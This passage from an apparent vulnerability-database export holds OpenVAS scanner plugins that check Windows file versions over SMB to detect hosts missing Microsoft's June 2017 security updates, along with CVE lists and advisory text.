98865,\n 98867, 98840, 98884, 98869, 98870, 98901, 98900, 98818, 98842,\n 98848, 98849);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:50:07 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022722)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022722\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3164035, users cannot print\n enhanced metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - Addressed issue where updates were not correctly installing all components and\n would prevent them from booting.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor. For the\n affected systems, follow the steps in the Additional Information section to\n install this update.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM and\n Windows shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022722\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23807\"))\n{\n report = 'File checked: ' + sysPath + \"\\Gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23807\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:37", "description": "This host is missing a critical security\n update according to Microsoft KB4022719", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022719)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022719)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811173\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\",\n \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\",\n \"CVE-2017-8543\", \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8547\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\",\n \"CVE-2017-0300\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8524\", \"CVE-2017-8519\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821,\n 98914, 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923,\n 98929, 98858, 98859, 98932, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98900,\n 98818, 98842, 98848, 98849, 98930, 98899);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 16:22:36 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022719)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022719\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are fue to,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - An issue with updates are not correctly installing all components and\n would prevent them from booting.\n\n - An unsupported hardware notification is shown and Windows Updates not\n scanning, for systems using the AMD Carrizo DDR4 processor.\n\n - An error in Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM,\n Internet Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user and take control of an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022719\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.7601.23834\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.7601.23834\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022724", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811171\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0289\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\", \"CVE-2017-8522\",\n \"CVE-2017-8469\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98953, 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821,\n 98914, 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826,\n 98932, 98929, 98835, 98836, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98840, 98867, 98869, 98870, 98884, 98901, 98887,\n 98900, 98818, 98848, 98849, 98899, 98926, 98842, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 15:20:54 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - After installing KB3164035, users cannot print enhanced\n metafiles (EMF) or documents containing bitmaps rendered out of bounds using the\n BitMapSection(DIBSection) function.\n\n - Updates were not correctly installing all components and would prevent them from\n booting.\n\n - An unsupported hardware notification is shown and Windows Updates not scanning,\n for systems using the AMD Carrizo DDR4 processor.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM, Internet\n Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022724\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:46:22", "description": "This host is missing a critical security\n update according to Microsoft KB4022717", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022717)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811165", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811165", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022717)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811165\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0291\", \"CVE-2017-0292\",\n \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\",\n \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8493\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914, 98922,\n 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826, 98835,\n 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865, 98867,\n 98840, 98884, 98869, 98870, 98901, 98887, 98850, 98900, 98818,\n 98842, 98848, 98849, 98843, 98844, 98846);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:42:25 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022717)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022717\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3170455 (MS16-087), users have\n difficulty importing printer drivers and get errors with error code 0x80070bcb.\n\n - Addressed a rare issue where mouse input can cease to function. The mouse\n pointer may continue to move, but movements and clicks produce no response other\n than a beeping noise.\n\n - Addressed issue where printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022717\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18698\"))\n{\n report = 'File checked: ' + sysPath + \"\\Win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18698\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:42:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022726", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022726)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022726)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811154\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\",\n \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8460\", \"CVE-2017-8493\", \"CVE-2017-8462\", 